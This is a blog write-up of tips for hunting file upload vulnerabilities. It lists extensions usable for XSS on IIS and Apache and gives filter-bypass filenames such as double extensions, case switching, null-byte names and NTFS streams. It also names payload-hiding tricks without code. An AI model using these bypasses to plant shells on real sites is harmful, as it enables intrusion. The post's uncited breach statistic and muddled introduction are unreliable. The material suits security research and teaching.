top of page

The Hunt For A File Upload Vulnerabilities

Hello everyone,

I am Nitin yadav(KD) back again with another write-up


The hunt for file upload has begun.



I have heard rumors that it may have been locked up inside some dark and quiet corner of one of the many caverns under the Internet. It's probably got a secret route and tons of keys that don't let others in.


Searching for a file upload in your database is time-consuming and error-prone. I've faced this problem countless times while working on a file upload functionality.





File upload vulnerabilities have gained a lot of attention lately with the number of high-profile breaches caused by them.

Why?


In today's world, companies are storing more and more user-uploaded data that can be accessed by an attacker from anywhere in the world.


In fact, over 85% of all data breaches involved some kind of improper handling of files.


So let's dive deep into it and how you as a security researcher can find them.

Tips to find vulneriblity?


Tip 1:

XSS: For IIS you can use these extensions:



HTML:

htm

hxt


XML:

dtd

vml

xsf

mno

wsdl

xslt

disco

exe.config

dll.config


For Apache HTTPd you can use:


HTML:

html.de

html.XXX


XML:

rdf

mathml


Commonly you can use:


HTML:

htm

html

shtml


XML:

xml

xsl

svg

svgz

xht

xhtml

xsd


Tip 2:


Filter bypass

  • Use Double extensions like .jpg.php, .php.jpg

  • Windows dots like cyberhacks.php.........

  • Switch Case like .pHp, .PhP

  • Slash suffixes like cyberhacks.php/ or cyberhacks.php.\

  • Windows NTFS ADS like cyberhacks.aspx:.jpg

  • Empty extension or filename like cyberhacks. or .php

  • Null bytes, spaces, new lines like cyberhacks .php, cyberhacks.png\%00.php, cyberhacks.php\%00.php, cyberhacks.png\%0d\%0a.php

  • The magic byte at the beginning like GIF89a....

  • Allowed Mime Type + disallowed extension

  • Disallowed Mime Type + allowed extension

  • Remove Content-type

Tip 3:


Hide the shell or XSS payload in image metadata


Tip 4:


Hide the shell or XSS payload in the image binary data




Tip 5:


Line Termination Trick


Tip 6:


Content-Disposition Overflow



Tip 7:


Filename Overflow



Tip 8:


Duplicate Line




Conclusion

It turns out that, even though the browsers block nearly all file upload vulnerabilities, hackers can find multiple ways around the problem.


If you want to avoid publicly available exploits and prevent your site from being compromised, you must go beyond what a vulnerability scanner can do. I discovered several vulnerabilities relating to file upload which a scanner will not be able to find out.


In closing, I hope that the tips I've listed above will not only help you in security research but also raise awareness about the need to take file upload vulnerabilities seriously.


If you learn something new from this blog please leave a comment below.

I hope you enjoyed this one and I see you next time :)



Take care and stay safe!




271 views0 comments